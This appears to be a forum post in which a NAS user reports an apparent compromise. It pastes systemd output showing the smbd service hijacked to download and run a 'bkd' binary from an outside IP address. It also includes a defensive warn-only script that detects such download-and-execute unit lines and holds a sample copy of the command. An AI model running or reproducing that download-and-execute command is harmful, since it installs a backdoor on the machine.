Could everyone take a look: has this been compromised?

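It started when SMB stopped working. I only got around to dealing with it a day later, and then I saw this: http://43.198.11.122/bkd. Has the machine been compromised? If the SMB service hadn't stopped working, which made me check the service status and notice the anomaly, I don't know when I would ever have found it.

I searched the forum and found no post that explains in detail how this vulnerability works. Is it that the service exposed on port 5666 has a vulnerability and was used for remote command execution? I still very much need external access. Can external access stay enabled from now on, and how can this kind of thing be effectively prevented?

Also, suppose this attack had been less obvious: say, instead of completely breaking smbd, it had kept smbd usable while running its own commands. Then users would probably never find out in their whole lives. Could the antivirus script posted on the forum be built into the system and run as a scheduled check (a warning is enough, don't delete the service)?

Also, when an emergency like this happens, shouldn't registered forum users be sent an email?

One more suggestion: after every system reboot, external drives have to be added again in SMB. I suggest implementing this feature.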

root@ubuntu-nas:/var/log/samba# service smbd status
● smbd.service - AutoStart Service
     Loaded: loaded (/etc/systemd/system/smbd.service; enabled; preset: enabled)
     Active: active (exited) since Wed 2026-02-04 18:48:38 CST; 1min 19s ago
   Main PID: 2165959 (code=exited, status=0/SUCCESS)
      Tasks: 3 (limit: 9294)
     Memory: 1.0M
        CPU: 261ms
     CGroup: /system.slice/smbd.service
             ├─2165961 
             ├─2166008 sh -c "cd /tmp;rm -rf bkd;wget http://43.198.11.122/bkd;chmod +x bkd;./bkd;rm -rf bkd"
             └─2166010 wget http://43.198.11.122/bkd

Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service...
Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service.
root@ubuntu-nas:/var/log/samba# journalctl --unit smbd
Feb 04 18:48:29 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service...
Feb 04 18:48:29 ubuntu-nas systemd[1]: smbd.service: Deactivated successfully.
Feb 04 18:48:29 ubuntu-nas systemd[1]: Stopped smbd.service - AutoStart Service.
Feb 04 18:48:29 ubuntu-nas systemd[1]: smbd.service: Consumed 3.040s CPU time.
Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service...
Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service.
Feb 04 18:48:38 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service...
Feb 04 18:48:38 ubuntu-nas systemd[1]: smbd.service: Deactivated successfully.
Feb 04 18:48:38 ubuntu-nas systemd[1]: Stopped smbd.service - AutoStart Service.
Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service...
Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service.
root@ubuntu-nas:/var/log/samba# ping 43.198.11.122
PING 43.198.11.122 (43.198.11.122) 56(84) bytes of data.
^C
--- 43.198.11.122 ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4100ms

root@ubuntu-nas:/var/log/samba# curl -L https://static2.fnnas.com/aptfix/trim-sec -o trim-sec

[*] sec执行结束
root@ubuntu-nas:/var/log/samba# service smbd status
Warning: The unit file, source configuration file or drop-ins of smbd.service changed on disk. Run 'systemctl daemon-re

Feb 04 18:48:38 ubuntu-nas systemd[1]: Starting smbd.service - AutoStart Service...
Feb 04 18:48:38 ubuntu-nas systemd[1]: Finished smbd.service - AutoStart Service.
Feb 04 18:58:57 ubuntu-nas systemd[1]: Stopping smbd.service - AutoStart Service...
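
A sketch of the scheduled, warn-only check the post asks for, added here as an example; it is not the poster's code and not the vendor's trim-sec script. It flags systemd unit files whose Exec lines download a file and then run it, the pattern visible in the smbd.service process list above. The function names, the match patterns, the sample unit contents and the address 203.0.113.10 are assumptions constructed for the illustration.

```shell
#!/bin/sh
# Warn-only check for systemd units whose Exec* lines download and run a file.
# Patterns and paths are assumptions for illustration, not the vendor's tool.

# Print Exec* lines that call wget/curl and also chmod the file, touch a
# world-writable temp directory, or pipe the download into a shell.
suspicious_exec_lines() {
    grep -E '^[[:space:]]*Exec[A-Za-z]*[[:space:]]*=' "$1" 2>/dev/null |
        grep -E '(^|[^[:alnum:]_])(wget|curl)[[:space:]]' |
        grep -E 'chmod[[:space:]]+(\+x|[0-7]{3,4})|/tmp|/var/tmp|/dev/shm|\|[[:space:]]*(ba)?sh'
}

# Scan all *.service files in a directory. Prints warnings only; it never
# edits or removes a unit. Returns 1 if anything was flagged, else 0.
scan_unit_dir() {
    found=0
    for unit in "$1"/*.service; do
        [ -f "$unit" ] || continue
        hits=$(suspicious_exec_lines "$unit") || continue
        printf 'WARN %s\n%s\n' "$unit" "$hits"
        found=1
    done
    return "$found"
}

# Constructed sample units: one shaped like the command in the post (with a
# documentation-range address), one ordinary Samba-style unit.
make_samples() {
    cat > "$1/smbd.service" <<'EOF'
[Unit]
Description=AutoStart Service
[Service]
ExecStart=/bin/sh -c "cd /tmp;rm -rf bkd;wget http://203.0.113.10/bkd;chmod +x bkd;./bkd;rm -rf bkd"
EOF
    cat > "$1/nmbd.service" <<'EOF'
[Unit]
Description=Samba NMB Daemon
[Service]
ExecStart=/usr/sbin/nmbd --foreground --no-process-group
EOF
}

# Usage: sh check-units.sh /etc/systemd/system   (e.g. from a daily cron job)
if [ -n "${1:-}" ]; then scan_unit_dir "$1"; fi
```

The check reads unit files only, so it will not catch a command started some other way, and an Exec line split across lines with a trailing backslash is matched one physical line at a time.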
